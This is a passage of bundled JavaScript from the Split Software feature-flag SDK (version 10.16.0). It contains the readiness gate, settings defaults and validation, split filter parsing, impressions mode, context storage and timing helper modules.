      // - `/mySegments` fetch and SPLIT_KILL occurs before `/splitChanges` fetch, and
      // - storage has cached splits (for which case `splitsStorage.killLocally` can return true)
      if (!isSplitKill) splitsStatus = SPLITS_READY;
      gate.emit(Events.READINESS_GATE_CHECK_STATE);
    });
    splits.once(Events.SDK_SPLITS_CACHE_LOADED, function () {
      gate.emit(Events.SDK_READY_FROM_CACHE);
    });
    segments.on(Events.SDK_SEGMENTS_ARRIVED, function () {
      segmentsStatus = SEGMENTS_READY;
      gate.emit(Events.READINESS_GATE_CHECK_STATE);
    });
    return gate;
  }
  /**
   * SDK Readiness Gate Factory
   *
   * The ready state in the browser relay on sharing the splits ready flag across
   * all the gates, and have an extra flag for the segments which is per gate
   * instance.
   */


  function SDKReadinessGateFactory(timeout) {
    if (timeout === void 0) {
      timeout = 0;
    }

    var readinessTimeoutId = 0;
    var segments = new __WEBPACK_IMPORTED_MODULE_0_events___default.a();
    segments.SDK_SEGMENTS_ARRIVED = Events.SDK_SEGMENTS_ARRIVED;
    var gate = ReadinessGateFactory(splits, segments);

    if (timeout > 0) {
      // Add the timeout.
      readinessTimeoutId = setTimeout(function () {
        gate.emit(Events.SDK_READY_TIMED_OUT, 'Split SDK emitted SDK_READY_TIMED_OUT event.');
      }, timeout); // Clear it if the SDK get's ready.

      gate.once(Events.SDK_READY, function () {
        return clearTimeout(readinessTimeoutId);
      });
    }

    gate.SDK_READY = Events.SDK_READY;
    gate.SDK_READY_FROM_CACHE = Events.SDK_READY_FROM_CACHE;
    gate.SDK_UPDATE = Events.SDK_UPDATE;
    gate.SDK_READY_TIMED_OUT = Events.SDK_READY_TIMED_OUT; // New Gate has been created, so increase the counter

    refCount++;
    return {
      // Emitters
      splits: splits,
      segments: segments,
      gate: gate,
      // Cleanup listeners
      destroy: function destroy() {
        segments.removeAllListeners();
        gate.removeAllListeners();
        clearTimeout(readinessTimeoutId);
        if (refCount > 0) refCount--;
        if (refCount === 0) splits.removeAllListeners();
      }
    };
  }

  return SDKReadinessGateFactory;
}

/* harmony default export */ __webpack_exports__["a"] = (GateContext);

/***/ }),
/* 2775 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__language__ = __webpack_require__(2776);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__runtime__ = __webpack_require__(2777);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__defaults__ = __webpack_require__(2778);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__storage__ = __webpack_require__(2779);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__integrations__ = __webpack_require__(2780);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__mode__ = __webpack_require__(2782);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__inputValidation_splitFilters__ = __webpack_require__(2783);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__utils_constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__impressionsMode__ = __webpack_require__(2784);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/












var version = '10.16.0';
var eventsEndpointMatcher = /^\/(testImpressions|metrics|events)/;
var authEndpointMatcher = /^\/v2\/auth/;
var streamingEndpointMatcher = /^\/(sse|event-stream)/;
var base = {
  // Define which kind of object you want to retrieve from SplitFactory
  mode: __WEBPACK_IMPORTED_MODULE_10__utils_constants__["m" /* STANDALONE_MODE */],
  core: {
    // API token (tight to an environment)
    authorizationKey: undefined,
    // key used in your system (only required for browser version)
    key: undefined,
    // traffic type for the given key (only used on browser version)
    trafficType: undefined,
    // toggle impressions tracking of labels
    labelsEnabled: true,
    // toggle sendind (true) or not sending (false) IP and Host Name with impressions, events, and telemetries requests (only used on nodejs version)
    IPAddressesEnabled: undefined
  },
  scheduler: {
    // fetch feature updates each 30 sec
    featuresRefreshRate: 30,
    // fetch segments updates each 60 sec
    segmentsRefreshRate: 60,
    // publish metrics each 120 sec
    metricsRefreshRate: 120,
    // publish evaluations each 60 sec
    impressionsRefreshRate: 60,
    // fetch offline changes each 15 sec
    offlineRefreshRate: 15,
    // publish events every 60 seconds after the first flush
    eventsPushRate: 60,
    // how many events will be queued before flushing
    eventsQueueSize: 500,
    // backoff base seconds to wait before re attempting to connect to push notifications
    pushRetryBackoffBase: 1
  },
  urls: {
    // CDN having all the information for your environment
    sdk: 'https://sdk.split.io/api',
    // Storage for your SDK events
    events: 'https://events.split.io/api',
    // SDK Auth Server
    auth: 'https://auth.split.io/api',
    // Streaming Server
    streaming: 'https://streaming.split.io'
  },
  // Defines which kind of storage we should instanciate.
  storage: {
    type: __WEBPACK_IMPORTED_MODULE_10__utils_constants__["o" /* STORAGE_MEMORY */]
  },
  // Defines if the logs are enabled, SDK wide.
  debug: undefined,
  // Defines the impression listener, but will only be used on NodeJS.
  impressionListener: undefined,
  // Instance version.
  version: __WEBPACK_IMPORTED_MODULE_2__language__["a" /* default */] + "-" + version,
  // List of integrations.
  integrations: undefined,
  // toggle using (true) or not using (false) Server-Side Events for synchronizing storage
  streamingEnabled: true,
  sync: {
    splitFilters: undefined,
    // impressions collection mode
    impressionsMode: __WEBPACK_IMPORTED_MODULE_10__utils_constants__["h" /* OPTIMIZED */]
  }
};

function fromSecondsToMillis(n) {
  return Math.round(n * 1000);
}

function setupLogger(debugValue) {
  if (typeof debugValue === 'boolean') {
    if (debugValue) {
      __WEBPACK_IMPORTED_MODULE_9__utils_logger__["a" /* API */].enable();
    } else {
      __WEBPACK_IMPORTED_MODULE_9__utils_logger__["a" /* API */].disable();
    }
  } else if (typeof debugValue === 'string') {
    __WEBPACK_IMPORTED_MODULE_9__utils_logger__["a" /* API */].setLogLevel(debugValue);
  }
}

function defaults(custom) {
  var withDefaults = Object(__WEBPACK_IMPORTED_MODULE_1__lang__["k" /* merge */])({}, base, __WEBPACK_IMPORTED_MODULE_4__defaults__["a" /* default */], custom); // Scheduler periods

  withDefaults.scheduler.featuresRefreshRate = fromSecondsToMillis(withDefaults.scheduler.featuresRefreshRate);
  withDefaults.scheduler.segmentsRefreshRate = fromSecondsToMillis(withDefaults.scheduler.segmentsRefreshRate);
  withDefaults.scheduler.metricsRefreshRate = fromSecondsToMillis(withDefaults.scheduler.metricsRefreshRate);
  withDefaults.scheduler.impressionsRefreshRate = fromSecondsToMillis(withDefaults.scheduler.impressionsRefreshRate);
  withDefaults.scheduler.offlineRefreshRate = fromSecondsToMillis(withDefaults.scheduler.offlineRefreshRate);
  withDefaults.scheduler.eventsPushRate = fromSecondsToMillis(withDefaults.scheduler.eventsPushRate); // Startup periods

  withDefaults.startup.requestTimeoutBeforeReady = fromSecondsToMillis(withDefaults.startup.requestTimeoutBeforeReady);
  withDefaults.startup.readyTimeout = fromSecondsToMillis(withDefaults.startup.readyTimeout);
  withDefaults.startup.eventsFirstPushWindow = fromSecondsToMillis(withDefaults.startup.eventsFirstPushWindow); // ensure a valid SDK mode

  withDefaults.mode = Object(__WEBPACK_IMPORTED_MODULE_7__mode__["a" /* default */])(withDefaults.core.authorizationKey, withDefaults.mode); // ensure a valid Storage based on mode defined.

  withDefaults.storage = Object(__WEBPACK_IMPORTED_MODULE_5__storage__["a" /* default */])(withDefaults);
  setupLogger(withDefaults.debug); // Current ip/hostname information

  withDefaults.runtime = Object(__WEBPACK_IMPORTED_MODULE_3__runtime__["a" /* default */])(withDefaults.core.IPAddressesEnabled, withDefaults.mode === __WEBPACK_IMPORTED_MODULE_10__utils_constants__["a" /* CONSUMER_MODE */]); // ensure a valid list of integrations.
  // `integrations` returns an array of valid integration items.

  withDefaults.integrations = Object(__WEBPACK_IMPORTED_MODULE_6__integrations__["a" /* default */])(withDefaults); // validate push options

  if (withDefaults.streamingEnabled !== false) {
    withDefaults.streamingEnabled = true; // Backoff bases.
    // We are not checking if bases are positive numbers. Thus, we might be reauthenticating immediately (`setTimeout` with NaN or negative number)

    withDefaults.scheduler.pushRetryBackoffBase = fromSecondsToMillis(withDefaults.scheduler.pushRetryBackoffBase);
  } // validate the `splitFilters` settings and parse splits query


  var splitFiltersValidation = Object(__WEBPACK_IMPORTED_MODULE_8__inputValidation_splitFilters__["a" /* default */])(withDefaults.sync.splitFilters, withDefaults.mode);
  withDefaults.sync.splitFilters = splitFiltersValidation.validFilters;
  withDefaults.sync.__splitFiltersValidation = splitFiltersValidation; // ensure a valid impressionsMode

  withDefaults.sync.impressionsMode = Object(__WEBPACK_IMPORTED_MODULE_11__impressionsMode__["a" /* default */])(withDefaults.sync.impressionsMode);
  return withDefaults;
}

var proto = {
  /**
   * Switch URLs servers based on target.
   *
   * @param {String} target url target
   * @return {String} completed url
   */
  url: function url(target) {
    if (eventsEndpointMatcher.test(target)) {
      return "" + this.urls.events + target;
    }

    if (authEndpointMatcher.test(target)) {
      return "" + this.urls.auth + target;
    }

    if (streamingEndpointMatcher.test(target)) {
      return "" + this.urls.streaming + target;
    }

    return "" + this.urls.sdk + target;
  },

  /**
   * Returns a settings clone with the key and traffic type (if provided) overriden.
   * @param {SplitKey} key
   * @param {string} [trafficType]
   */
  overrideKeyAndTT: function overrideKeyAndTT(key, trafficType) {
    return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()(Object.create(proto), this, {
      core: __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, this.core, {
        key: key,
        trafficType: trafficType
      })
    });
  }
};

var SettingsFactory = function SettingsFactory(settings) {
  return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()(Object.create(proto), defaults(settings));
};

/* harmony default export */ __webpack_exports__["a"] = (SettingsFactory);

/***/ }),
/* 2776 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
/* harmony default export */ __webpack_exports__["a"] = ('javascript');

/***/ }),
/* 2777 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = generateRuntimeSettings;
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function generateRuntimeSettings() {
  return {
    ip: false,
    hostname: false
  };
}

/***/ }),
/* 2778 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony default export */ __webpack_exports__["a"] = ({
  startup: {
    // Stress the request time used while starting up the SDK.
    requestTimeoutBeforeReady: 5,
    // How many quick retries we will do while starting up the SDK.
    retriesOnFailureBeforeReady: 1,
    // Maximum amount of time used before notifies me a timeout.
    readyTimeout: 10,
    // Amount of time we will wait before the first push of events.
    eventsFirstPushWindow: 10
  }
});

/***/ }),
/* 2779 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_localstorage_isAvailable__ = __webpack_require__(1273);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_constants__ = __webpack_require__(56);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-settings');



var ParseStorageSettings = function ParseStorageSettings(settings) {
  var _settings$storage = settings.storage,
      _settings$storage$typ = _settings$storage.type,
      type = _settings$storage$typ === void 0 ? __WEBPACK_IMPORTED_MODULE_2__utils_constants__["o" /* STORAGE_MEMORY */] : _settings$storage$typ,
      _settings$storage$opt = _settings$storage.options,
      options = _settings$storage$opt === void 0 ? {} : _settings$storage$opt,
      prefix = _settings$storage.prefix;

  if (prefix) {
    prefix += '.SPLITIO';
  } else {
    prefix = 'SPLITIO';
  } // If an invalid storage type is provided OR we want to use LOCALSTORAGE and
  // it's not available, fallback into MEMORY


  if (type !== __WEBPACK_IMPORTED_MODULE_2__utils_constants__["o" /* STORAGE_MEMORY */] && type !== __WEBPACK_IMPORTED_MODULE_2__utils_constants__["n" /* STORAGE_LOCALSTORAGE */] || type === __WEBPACK_IMPORTED_MODULE_2__utils_constants__["n" /* STORAGE_LOCALSTORAGE */] && !Object(__WEBPACK_IMPORTED_MODULE_1__utils_localstorage_isAvailable__["a" /* default */])()) {
    type = __WEBPACK_IMPORTED_MODULE_2__utils_constants__["o" /* STORAGE_MEMORY */];
    log.warn('Invalid or unavailable storage. Fallbacking into MEMORY storage');
  }

  return {
    type: type,
    options: options,
    prefix: prefix
  };
};

/* harmony default export */ __webpack_exports__["a"] = (ParseStorageSettings);

/***/ }),
/* 2780 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__common__ = __webpack_require__(2781);



var validateBrowserIntegrationsSettings = function validateBrowserIntegrationsSettings(settings) {
  return Object(__WEBPACK_IMPORTED_MODULE_1__common__["a" /* default */])(settings, [__WEBPACK_IMPORTED_MODULE_0__utils_constants__["f" /* GOOGLE_ANALYTICS_TO_SPLIT */], __WEBPACK_IMPORTED_MODULE_0__utils_constants__["l" /* SPLIT_TO_GOOGLE_ANALYTICS */]]);
};

/* harmony default export */ __webpack_exports__["a"] = (validateBrowserIntegrationsSettings);

/***/ }),
/* 2781 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_logger__ = __webpack_require__(9);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__utils_lang__ = __webpack_require__(13);


var log = Object(__WEBPACK_IMPORTED_MODULE_0__utils_logger__["b" /* default */])('splitio-settings');
/**
 * This function validates `settings.integrations` object
 *
 * @param {Object} settings SDK settings object to validate
 * @param {Array<string>} validIntegrationTypes list of integration types to filter from `settings.integrations`
 *
 * @returns {Array} array of valid integration items. The array might be empty if `settings` object does not have valid integrations.
 */

var validateIntegrationsSettings = function validateIntegrationsSettings(settings, validIntegrationTypes) {
  if (validIntegrationTypes === void 0) {
    validIntegrationTypes = [];
  }

  var integrations = settings.integrations; // If integrations is not an array or an empty array, we return an empty array (no integrations).

  if (!Array.isArray(integrations) || integrations.length === 0) return []; // We remove invalid integration items

  var validIntegrations = integrations.filter(function (integration) {
    return integration && Object(__WEBPACK_IMPORTED_MODULE_1__utils_lang__["j" /* isString */])(integration.type) && validIntegrationTypes.indexOf(integration.type) > -1;
  });
  var invalids = integrations.length - validIntegrations.length;
  if (invalids) log.warn(invalids + " integration " + (invalids === 1 ? 'item' : 'items') + " at settings " + (invalids === 1 ? 'is' : 'are') + " invalid: integration items must have a valid 'type' value");
  return validIntegrations;
};

/* harmony default export */ __webpack_exports__["a"] = (validateIntegrationsSettings);

/***/ }),
/* 2782 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(56);


function mode(key, mode) {
  // Leaving the comparison as is, in case we change the mode name but not the setting.
  if (key === 'localhost') return __WEBPACK_IMPORTED_MODULE_0__constants__["g" /* LOCALHOST_MODE */];
  if ([__WEBPACK_IMPORTED_MODULE_0__constants__["m" /* STANDALONE_MODE */], __WEBPACK_IMPORTED_MODULE_0__constants__["i" /* PRODUCER_MODE */], __WEBPACK_IMPORTED_MODULE_0__constants__["a" /* CONSUMER_MODE */]].indexOf(mode) === -1) throw Error('Invalid mode provided');
  return mode;
}

/* harmony default export */ __webpack_exports__["a"] = (mode);

/***/ }),
/* 2783 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = validateSplitFilters;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__splits__ = __webpack_require__(1275);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__logger__ = __webpack_require__(9);



var log = Object(__WEBPACK_IMPORTED_MODULE_2__logger__["b" /* default */])('splitio-settings');

function validateFilterType(filterType) {
  return __WEBPACK_IMPORTED_MODULE_0__constants__["e" /* FILTERS_METADATA */].some(function (filterMetadata) {
    return filterMetadata.type === filterType;
  });
}
/**
 * Validate, deduplicate and sort a given list of filter values.
 *
 * @param {string} type filter type string used for log messages
 * @param {string[]} values list of values to validate, deduplicate and sort
 * @param {number} maxLength
 * @returns list of valid, unique and alphabetically sorted non-empty strings. The list is empty if `values` param is not a non-empty array or all its values are invalid.
 *
 * @throws Error if the sanitized list exceeds the length indicated by `maxLength`
 */


function validateSplitFilter(type, values, maxLength) {
  // validate and remove invalid and duplicated values
  var result = Object(__WEBPACK_IMPORTED_MODULE_1__splits__["a" /* validateSplits */])(values, 'settings', type + " filter", type + " filter value");

  if (result) {
    // check max length
    if (result.length > maxLength) throw new Error(maxLength + " unique values can be specified at most for '" + type + "' filter. You passed " + result.length + ". Please consider reducing the amount or using other filter."); // sort values

    result.sort();
  }

  return result || []; // returns empty array if `result` is `false`
}
/**
 * Returns a string representing the URL encoded query component of /splitChanges URL.
 *
 * The possible formats of the query string are:
 *  - null: if all filters are empty
 *  - '&names=<comma-separated-values>': if only `byPrefix` filter is undefined
 *  - '&prefixes=<comma-separated-values>': if only `byName` filter is undefined
 *  - '&names=<comma-separated-values>&prefixes=<comma-separated-values>': if no one is undefined
 *
 * @param {Object} groupedFilters object of filters. Each filter must be a list of valid, unique and ordered string values.
 * @returns null or string with the `split filter query` component of the URL.
 */


function queryStringBuilder(groupedFilters) {
  var queryParams = [];
  __WEBPACK_IMPORTED_MODULE_0__constants__["e" /* FILTERS_METADATA */].forEach(function (_ref) {
    var type = _ref.type,
        queryParam = _ref.queryParam;
    var filter = groupedFilters[type];
    if (filter.length > 0) queryParams.push(queryParam + filter.map(function (value) {
      return encodeURIComponent(value);
    }).join(','));
  });
  return queryParams.length > 0 ? '&' + queryParams.join('&') : null;
}
/**
 * Validates `splitFilters` configuration object and parses it into a query string for filtering splits on `/splitChanges` fetch.
 *
 * @param {Object|undefined} splitFilters split filters configuration param
 * @param {string} mode settings mode
 * @returns it returns an object with the following properties:
 *  - `validFilters`: the validated `splitFilters` configuration object defined by the user.
 *  - `queryString`: the parsed split filter query. it is null if all filters are invalid or all values in filters are invalid.
 *  - `groupedFilters`: list of values grouped by filter type.
 *
 * @throws Error if the some of the grouped list of values per filter exceeds the max allowed length
 */


function validateSplitFilters(splitFilters, mode) {
  // Validation result schema
  var res = {
    validFilters: [],
    queryString: null,
    groupedFilters: {
      byName: [],
      byPrefix: []
    }
  }; // do nothing if `splitFilters` param is not a non-empty array or mode is not STANDALONE

  if (!splitFilters) return res; // Warn depending on the mode

  if (mode !== __WEBPACK_IMPORTED_MODULE_0__constants__["m" /* STANDALONE_MODE */]) {
    log.warn("split filters have been configured but will have no effect if mode is not '" + __WEBPACK_IMPORTED_MODULE_0__constants__["m" /* STANDALONE_MODE */] + "', since synchronization is being deferred to an external tool.");
    return res;
  } // Check collection type


  if (!Array.isArray(splitFilters) || splitFilters.length === 0) {
    log.warn('splitFilters configuration must be a non-empty array of filter objects.');
    return res;
  } // Validate filters and group their values by filter type inside `groupedFilters` object


  res.validFilters = splitFilters.filter(function (filter, index) {
    if (filter && validateFilterType(filter.type) && Array.isArray(filter.values)) {
      res.groupedFilters[filter.type] = res.groupedFilters[filter.type].concat(filter.values);
      return true;
    } else {
      log.warn("split filter at position '" + index + "' is invalid. It must be an object with a valid filter type ('byName' or 'byPrefix') and a list of 'values'.");
    }

    return false;
  }); // By filter type, remove invalid and duplicated values and order them

  __WEBPACK_IMPORTED_MODULE_0__constants__["e" /* FILTERS_METADATA */].forEach(function (_ref2) {
    var type = _ref2.type,
        maxLength = _ref2.maxLength;
    if (res.groupedFilters[type].length > 0) res.groupedFilters[type] = validateSplitFilter(type, res.groupedFilters[type], maxLength);
  }); // build query string

  res.queryString = queryStringBuilder(res.groupedFilters);
  log.debug("splits filtering criteria is '" + res.queryString + "'.");
  return res;
}

/***/ }),
/* 2784 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__logger__ = __webpack_require__(9);


var log = Object(__WEBPACK_IMPORTED_MODULE_1__logger__["b" /* default */])('splitio-settings');

function validImpressionsMode(impressionsMode) {
  impressionsMode = impressionsMode.toUpperCase();

  if ([__WEBPACK_IMPORTED_MODULE_0__constants__["d" /* DEBUG */], __WEBPACK_IMPORTED_MODULE_0__constants__["h" /* OPTIMIZED */]].indexOf(impressionsMode) === -1) {
    log.error("You passed an invalid impressionsMode, impressionsMode should be one of the following values: '" + __WEBPACK_IMPORTED_MODULE_0__constants__["d" /* DEBUG */] + "' or '" + __WEBPACK_IMPORTED_MODULE_0__constants__["h" /* OPTIMIZED */] + "'. Defaulting to '" + __WEBPACK_IMPORTED_MODULE_0__constants__["h" /* OPTIMIZED */] + "' mode.");
    impressionsMode = __WEBPACK_IMPORTED_MODULE_0__constants__["h" /* OPTIMIZED */];
  }

  return impressionsMode;
}

/* harmony default export */ __webpack_exports__["a"] = (validImpressionsMode);

/***/ }),
/* 2785 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__promise_thenable__ = __webpack_require__(75);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__constants__ = __webpack_require__(2786);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/




var Context = /*#__PURE__*/function () {
  function Context() {
    this._map = {};
    this.constants = __WEBPACK_IMPORTED_MODULE_2__constants__["a" /* default */];
  }
  /**
   * Gets an item in the context instance or a promise if the item is not yet stored and we are not doing a one time check.
   * @param {String} name - The name of the item we want to get
   * @return {Any} The item we want to get.
   */


  var _proto = Context.prototype;

  _proto.get = function get(name, flagCheck) {
    if (flagCheck === void 0) {
      flagCheck = false;
    }

    if (typeof name !== 'string' || typeof name === 'string' && !name.length) return; // Wrong usage, don't generate item promise.

    var item = this._map[name]; // If we have the item, return it.

    if (item !== undefined) {
      return item;
    } else if (!flagCheck) {
      // If we don't and it's not a flag check, return a promise that we will resolve once we receive the item.
      var resolve;
      var promise = new Promise(function (res) {
        return resolve = res;
      });
      promise.manualResolve = resolve;
      this._map[name] = promise;
      return promise;
    }
  }
  /**
   * Gets all objects stored in the context.
   * @return {Object} - A new map of context-stored items.
   */
  ;

  _proto.getAll = function getAll() {
    return __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({}, this._map);
  }
  /**
   * Stores an item in the context instance.
   * @param {String} name - The name of what we are storing
   * @param {Any} item - The item can be of any type.
   * @return {Boolean} - The result of the operation
   */
  ;

  _proto.put = function put(name, item) {
    var _this = this;

    if (typeof name !== 'string' || typeof name === 'string' && !name.length || item === undefined) return false; // We can't store this.

    var existingItem = this._map[name]; // Item already exists and no one is waiting for the item. Abort and return false.

    if (existingItem !== undefined && typeof existingItem.manualResolve !== 'function') return false; // Someone is waiting for this item, resolve to it.

    if (Object(__WEBPACK_IMPORTED_MODULE_1__promise_thenable__["a" /* default */])(existingItem) && existingItem.manualResolve) existingItem.manualResolve(item); // We are storing a promise, when resolving save the item. On error, clean up the item.

    if (Object(__WEBPACK_IMPORTED_MODULE_1__promise_thenable__["a" /* default */])(item)) {
      item.then(function (item) {
        _this._map[name] = item;
        return item;
      }).catch(function (err) {
        _this._map[name] = undefined;
        return err;
      });
    }

    this._map[name] = item;
    return true;
  };

  return Context;
}();

/* harmony default export */ __webpack_exports__["a"] = (Context);

/***/ }),
/* 2786 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export COLLECTORS */
/* unused harmony export DESTROYED */
/* unused harmony export EVENTS */
/* unused harmony export HAS_TIMEDOUT */
/* unused harmony export INTEGRATIONS_MANAGER */
/* unused harmony export MY_SEGMENTS_CHANGE_WORKER */
/* unused harmony export PRODUCER */
/* unused harmony export READINESS */
/* unused harmony export READY */
/* unused harmony export READY_FROM_CACHE */
/* unused harmony export SETTINGS */
/* unused harmony export STATUS_MANAGER */
/* unused harmony export STORAGE */
/* unused harmony export IMPRESSIONS_COUNTER */
var COLLECTORS = 'metrics_collectors';
var DESTROYED = 'is_destroyed';
var EVENTS = 'events_publisher';
var HAS_TIMEDOUT = 'has_timedout';
var INTEGRATIONS_MANAGER = 'integrations_manager';
var MY_SEGMENTS_CHANGE_WORKER = 'my_segments_change_worker';
var PRODUCER = 'producer';
var READINESS = 'readiness_gate';
var READY = 'is_ready';
var READY_FROM_CACHE = 'is_ready_from_cache';
var SETTINGS = 'settings';
var STATUS_MANAGER = 'status_manager';
var STORAGE = 'storage';
var IMPRESSIONS_COUNTER = 'impressions_counter';
/* harmony default export */ __webpack_exports__["a"] = ({
  COLLECTORS: COLLECTORS,
  DESTROYED: DESTROYED,
  EVENTS: EVENTS,
  HAS_TIMEDOUT: HAS_TIMEDOUT,
  INTEGRATIONS_MANAGER: INTEGRATIONS_MANAGER,
  MY_SEGMENTS_CHANGE_WORKER: MY_SEGMENTS_CHANGE_WORKER,
  PRODUCER: PRODUCER,
  READINESS: READINESS,
  READY: READY,
  READY_FROM_CACHE: READY_FROM_CACHE,
  SETTINGS: SETTINGS,
  STATUS_MANAGER: STATUS_MANAGER,
  STORAGE: STORAGE,
  IMPRESSIONS_COUNTER: IMPRESSIONS_COUNTER
});

/***/ }),
/* 2787 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__now__ = __webpack_require__(2788);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function start() {
  var st = Object(__WEBPACK_IMPORTED_MODULE_0__now__["a" /* default */])();
  return function stop() {
    return Math.round(Object(__WEBPACK_IMPORTED_MODULE_0__now__["a" /* default */])() - st);
  };
}

/* harmony default export */ __webpack_exports__["a"] = (start);

/***/ }),
/* 2788 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function nowFactory() {
  // eslint-disable-next-line compat/compat
  if (typeof performance === 'object' && typeof performance.now === 'function') {
    // eslint-disable-next-line compat/compat
    return performance.now.bind(performance);
  } else {
    return Date.now;
  }
}

var now = nowFactory();
/* harmony default export */ __webpack_exports__["a"] = (now);

/***/ }),
/* 2789 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
